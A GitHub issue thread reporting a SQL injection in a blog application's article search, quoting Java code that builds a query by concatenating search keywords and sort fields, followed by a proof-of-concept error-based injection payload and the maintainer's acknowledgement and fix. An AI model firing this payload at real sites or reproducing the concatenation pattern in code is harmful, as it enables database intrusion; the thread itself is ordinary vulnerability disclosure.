Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There is a sql injection in the article search box #37

Closed
3lse opened this Issue Sep 18, 2018 · 4 comments

Comments

Projects
None yet
3 participants
@3lse
Copy link

3lse commented Sep 18, 2018

Log.java

String sql = "select l.*,l.privacy privacy,t.typeName,l.logId as id,l.last_update_date as lastUpdateDate,t.alias as typeAlias,u.userName,(select count(commentId) from " + Comment.TABLE_NAME + " where logId=l.logId ) commentSize from " + TABLE_NAME + " l inner join user u inner join type t where u.userId=l.userId" + searchKeywords + " and t.typeid=l.typeid order by " + pageSort + " limit ?,?";
        data.put("rows", findEntry(sql, ParseUtil.getFirstRecord(page, pageSize), pageSize));
        ModelUtil.fillPageData(this, page, pageSize, "from " + TABLE_NAME + " l inner join user u where u.userId=l.userId " + searchKeywords, data, new Object[]{});
        return data;

TABLE_NAME Field not verified

@3lse

This comment has been minimized.

Copy link
Author

3lse commented Sep 18, 2018

Poc
keywords=aaaa') AND (SELECT 8405 FROM(SELECT COUNT(*),CONCAT(0x71706a6271,(SELECT (ELT(8405=8405,1))),0x7176787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('VybC'='VybC&_search=false&nd=1537172851162&rows=10&page=1&sidx=&sord=asc

@94fzb

This comment has been minimized.

Copy link
Owner

94fzb commented Sep 19, 2018

@3lse Thanks this sql injection need admin login, so not worry, I fix this bug in recent days, And this sql injection just work on query statement.

@94fzb 94fzb added the bug label Sep 19, 2018

@attritionorg

This comment has been minimized.

Copy link

attritionorg commented Sep 28, 2018

@94fzb can you link to the fixing commit please?

@94fzb 94fzb closed this in 157b8fb Sep 28, 2018

@attritionorg

This comment has been minimized.

Copy link

attritionorg commented Sep 28, 2018

Thank you @94fzb!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.